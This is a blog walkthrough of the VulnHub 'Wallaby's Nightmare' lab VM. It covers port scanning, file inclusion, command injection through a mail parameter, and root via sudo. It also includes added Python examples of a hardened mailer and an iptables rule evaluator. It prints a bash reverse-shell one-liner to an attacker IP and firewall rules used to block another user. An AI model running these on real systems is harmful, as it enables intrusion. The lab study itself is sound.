18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Wallaby's: Nightmare

Location

https://download.vulnhub.com/wallabys/wallabysnightmare.rar

Introduction

Level: beginner-intermediate
This is the first boot2root machine created by Waldo.
It’s the first part in a two part series. The creator was inspired by many VMs from vulnhub.com and made this with different attack vectors. The machine will respond to how the ‘intruder’ tries to get in. Make a wrong move and some stuff gets moved around, which makes the machine more difficult!
It was created for educational purposes and so people can have a little fun testing their skills in a legal, pentest lab environment.
Scenario: The intruder is breaking into a fictional character's server (named Wallaby) and tries to gain root without him noticing, or else the difficulty level will increase if you make the wrong move!

Getting Started

First I run an nmap scan to discover any open ports.

┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.4
Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-30 13:37 CET
Nmap scan report for 192.168.171.4
Host is up (0.00054s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA)
|_  256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA)
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Wallaby's Server
6667/tcp filtered irc
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds

My first stop is the SSH server for some banner grabbing.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh 192.168.171.4 -p 22
The authenticity of host '192.168.171.4 (192.168.171.4)' can't be established.
ECDSA key fingerprint is SHA256:nRDXRBPtapHeG1jqIbacovukdKPIveFVy1GE8kntdU4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.171.4' (ECDSA) to the list of known hosts.
n13mant@192.168.171.4's password:

No useful banner here. Onward to the webserver.



Things are getting serious!
The URL uses a parameter to select the page. When I change that parameter to a file path I get the contents of ‘/etc/passwd’, so the page is vulnerable to local file inclusion (LFI).

Looks like there are two users: “walfin” and “steven?”.

Looks like this vector is gone. After another nmap scan it seems that port 80 is now closed and the webserver has moved to a different port.

┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.4
Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-30 14:04 CET
Nmap scan report for 192.168.171.4
Host is up (0.00094s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA)
|_  256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA)
6667/tcp  filtered irc
60080/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Wallaby's Server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.02 seconds


Let’s see if the previous vulnerability is still active.

Looks like the LFI vulnerability still exists. Or so I thought.

Guess I’m being trolled here. Time for finding a new vector.
Because dirb wasn’t getting me anywhere I tried Wfuzz.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $wfuzz -c -z file,/usr/share/wordlists/openwordlist/language/english/lower.lst --hc 404 --hw 87 http://192.168.171.4:60080/?page=FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************
Target: http://192.168.171.4:60080/?page=FUZZ
Total requests: 390532
==================================================================
ID	Response   Lines      Word         Chars          Request
==================================================================
37084:  C=200     27 L	     106 W	    994 Ch	  "blacklist"
...
69281:  C=200     26 L	      86 W	    895 Ch	  "contact"
...
147277:  C=200     30 L	     115 W	   1147 Ch	  "home"
...
158165:  C=200     38 L	     150 W	   1362 Ch	  "index"
...
186261:  C=200     29 L	     102 W	   1085 Ch	  "mailer"
-----SNIP-----

After checking some pages I got to the last one on my list, mailer, which turned out to be the most promising one. Its HTML source contains this comment:


<!--a href='/?page=mailer&mail=mail wallaby "message goes here"'><button type='button'>Sendmail</button-->
    <!--Better finish implementing this so N13manT
 can send me all his loser complaints!-->

The mail parameter, which only shows up in that commented-out HTML, is vulnerable to arbitrary command execution: whatever is passed in it gets run on the server.
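To show what that bug looks like from the developer's side, here is an added example (not the VM's code): the vulnerable pattern is a handler that hands the raw mail query value to a shell, and next to it a hardened handler that accepts only a recipient and a message body, validates both, and calls mail(1) with an argv list instead of a shell. The to/msg parameter names, the allowed-recipient list and the mail -s subject are assumptions.

```python
import re
import subprocess
from urllib.parse import parse_qs

# The commented-out button sent the whole command line in one query value:
#   /?page=mailer&mail=mail wallaby "message goes here"
# A handler that runs request["mail"] through a shell lets the client choose
# the command. hardened_mailer (added example, not the VM's code) accepts only
# a recipient and a body, validates both, and never involves a shell.

USER_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")   # plain local login names
ALLOWED_RECIPIENTS = ("wallaby",)   # assumption: the only mailbox the form may reach


def vulnerable_mailer(query_string):
    """Return the string the original page handed to the shell, unchanged."""
    return parse_qs(query_string)["mail"][0]


def hardened_mailer(query_string):
    """Return (argv, stdin_bytes) for a safe mail(1) call, or raise ValueError."""
    params = parse_qs(query_string, strict_parsing=True)
    to = params.get("to", [""])[0]
    body = params.get("msg", [""])[0]
    if not USER_RE.fullmatch(to) or to not in ALLOWED_RECIPIENTS:
        raise ValueError("recipient not allowed")
    if not body.strip() or len(body) > 4096:
        raise ValueError("empty or oversized message")
    if any(ord(c) < 32 and c not in "\n\t" for c in body):
        raise ValueError("control characters in message")
    # argv list + shell=False: quotes, semicolons or $( ) in the body are
    # nothing more than bytes written to mail's stdin.
    argv = ["mail", "-s", "Website message", to]
    return argv, body.encode()


def send(query_string):
    """Actually deliver; not exercised in the checks since it needs mail(1)."""
    argv, stdin = hardened_mailer(query_string)
    return subprocess.run(argv, input=stdin, shell=False, check=False).returncode
```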

Because it will be much easier to recon the system with a shell, I use a bash command to create a reverse shell.

bash -c "bash -i >& /dev/tcp/192.168.171.2/31337 0>&1"

which I URL-encode before passing it in the mail parameter.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 37744
bash: cannot set terminal process group (1074): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html$
www-data@ubuntu:/var/www/html$ ls -lah /home
ls -lah /home
total 20K
drwxr-xr-x  5 root    root    4.0K Dec 16 15:44 .
drwxr-xr-x 22 root    root    4.0K Dec 14 19:24 ..
drwxr-xr-x  5 ircd    ircd    4.0K Dec 16 15:28 ircd
drwxr-xr-x  5 waldo   waldo   4.0K Dec 16 16:51 waldo
drwxr-xr-x  8 wallaby wallaby 4.0K Dec 16 16:02 wallaby

Looks like there are two users and an IRC bot.

www-data@ubuntu:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    (ALL) NOPASSWD: /sbin/iptables

It seems I have some sudo rights. For instance, I can change the firewall rules.

www-data@ubuntu:/$ sudo iptables -S
sudo iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6667 -j DROP

There is a rule that drops packets to port 6667 unless they come from localhost. That matches the ‘6667/tcp filtered irc’ line in my nmap scan: a DROP rule silently discards the probe, so nmap reports the port as filtered rather than closed.

www-data@ubuntu:/$ netstat -anp | grep "LISTEN"
netstat -anp | grep "LISTEN"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::60080                :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -

The listening sockets confirm that an IRC server is running locally on port 6667.

www-data@ubuntu:/$ dpkg -l
dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name           Version      Architecture Description
+++-==============-============-============-=================================
-----SNIP-----
ii  irssi          0.8.19-1ubun amd64        terminal based IRC client
-----SNIP-----
www-data@ubuntu:/home/waldo$ ./irssi.sh
./irssi.sh
no server running on /tmp/tmux-33/default

At first I tried to use an IRC client on the remote machine, but that didn’t work. So, because I can alter the firewall rules, I can flush the iptables rules and connect to the IRC port from my own machine.


After a few tries I get a channel with a user named Waldo and a bot.

The bot has its own command to list its custom commands, since /help is handled by HexChat itself. The bot command is .help.


Oh oh... busted! So it knows I’m not Waldo. I need to get Waldo out of the chatroom and take over the waldo username. But how? I’ve tried the kick/ban options on this side; that didn’t work. So I need to deny his access from the other side... back to the firewall rules.

www-data@ubuntu:/home/wallaby$ id waldo
id waldo
uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)

To build the correct rule I looked it up on a site that gave me the answer I was looking for: iptables can match outgoing packets by the UID of the process that sends them.

www-data@ubuntu:/home/wallaby$ sudo iptables -I OUTPUT -m owner --uid-owner 1000 -p tcp --dport 6667 -j DROP
www-data@ubuntu:/home/wallaby$ sudo iptables -L
sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  anywhere             anywhere             owner UID match waldo tcp dpt:ircd

After a while waldo is gone... the king is dead, long live the king!
With the /nick command I change my nickname to ‘waldo’ and assume his place.
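To check what those rules actually do to a packet, here is a small evaluator, added as an example and not part of the original post, covering both the INPUT rules from the earlier sudo iptables -S listing and the owner-match OUTPUT rule above. The rules text is a constructed sample written in iptables -S form (first matching rule wins, otherwise the chain policy applies); a DROP verdict on INPUT is exactly what nmap reported as ‘filtered’ on 6667.

```python
import ipaddress
import shlex

# Constructed sample: the INPUT rules seen on the box plus the owner-match
# OUTPUT rule, written the way `iptables -S` prints them.
RULES_TEXT = """
-P INPUT ACCEPT
-P OUTPUT ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6667 -j DROP
-A OUTPUT -p tcp -m owner --uid-owner 1000 -m tcp --dport 6667 -j DROP
"""


def parse_rule(tokens):
    """Turn the tokens after '-A <chain>' into a dict of match criteria."""
    rule, i = {}, 0
    while i < len(tokens):
        opt, arg = tokens[i], tokens[i + 1]
        if opt == "-s":
            rule["src"] = ipaddress.ip_network(arg)
        elif opt == "-p":
            rule["proto"] = arg
        elif opt == "--dport":
            rule["dport"] = int(arg)
        elif opt == "--uid-owner":
            rule["uid"] = int(arg)
        elif opt == "-j":
            rule["target"] = arg
        elif opt != "-m":          # '-m <name>' only loads a match module
            raise ValueError(f"unsupported option {opt}")
        i += 2
    return rule


def parse_rules(text):
    """Return (chain policies, rules per chain) from `iptables -S` output."""
    policies, chains = {}, {}
    for line in text.strip().splitlines():
        tok = shlex.split(line)
        if tok[0] == "-P":
            policies[tok[1]] = tok[2]
        elif tok[0] == "-A":
            chains.setdefault(tok[1], []).append(parse_rule(tok[2:]))
    return policies, chains


def verdict(policies, chains, chain, dport, proto="tcp", src=None, uid=None):
    """First matching rule decides; without a match the chain policy applies."""
    for r in chains.get(chain, []):
        if "src" in r and (src is None or ipaddress.ip_address(src) not in r["src"]):
            continue
        if r.get("proto", proto) != proto or r.get("dport", dport) != dport:
            continue
        if "uid" in r and r["uid"] != uid:    # owner match: sending process UID
            continue
        return r["target"]
    return policies[chain]
```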

Time for another reverse shell. I use the same one as before, but this time change the port number to 1337.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 1337
listening on [any] 1337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 60128
bash: cannot set terminal process group (699): Inappropriate ioctl for device
bash: no job control in this shell
wallaby@ubuntu:~$ id
id
uid=1001(wallaby) gid=1001(wallaby) groups=1001(wallaby),4(adm)
wallaby@ubuntu:~$

After this it was easy to obtain root.

wallaby@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for wallaby on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wallaby may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL
wallaby@ubuntu:~$ sudo su -
sudo su -
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# cd /root
cd /root
root@ubuntu:~# ls -lah
ls -lah
total 48K
drwx------  4 root root 4.0K Dec 27 19:31 .
drwxr-xr-x 22 root root 4.0K Dec 14 19:24 ..
drwxr-xr-x  2 root root 4.0K Dec 27 11:27 backups
-rw-------  1 root root    1 Dec 27 12:26 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
-rwxr-xr-x  1 root root  510 Dec 27 19:31 check_level.sh
-rw-r--r--  1 root root  342 Dec 16 16:52 flag.txt
-rw-------  1 root root   18 Dec 15 13:03 .mysql_history
drwxr-xr-x  2 root root 4.0K Dec 15 13:10 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Dec 15 17:50 .selected_editor
-rw-r--r--  1 root root  214 Dec 16 17:09 .wget-hsts
root@ubuntu:~# cat flag.txt
cat flag.txt
###CONGRATULATIONS###
You beat part 1 of 2 in the "Wallaby's Worst Knightmare" series of vms!!!!
This was my first vulnerable machine/CTF ever!  I hope you guys enjoyed playing it as much as I enjoyed making it!
Come to IRC and contact me if you find any errors or interesting ways to root, I'd love to hear about it.
Thanks guys!
-Waldo

Conclusion

This challenge was fun to do. The difficulty level didn’t change that much, and after the first moment of being “caught” there wasn’t really a game changer. The machine did feel a bit “buggy” when I was trying to execute an arbitrary command and the system didn’t respond. After a reset of the machine and following the exact same steps I had a better and smoother experience.
Thanks Waldo for making this VM. Hope to see more of your work in the near future.

2 thoughts on “Wallaby's: Nightmare”

  1. I have a doubt about the IP you start to Nmap!
    How did you get this IP address 192.168.171.4?
    Sorry, I’m totally new to this field, please help.

    1. Hi Yash,
      192.168.171.4 was assigned by the DHCP server.
      This is not an external IP address. So if you try to scan the same IP, you won’t get any good result.
      When you run the image on your VMware or Vbox it will get its own IP address. You can set the IP range yourself in the settings of your VM software.
      Good luck.
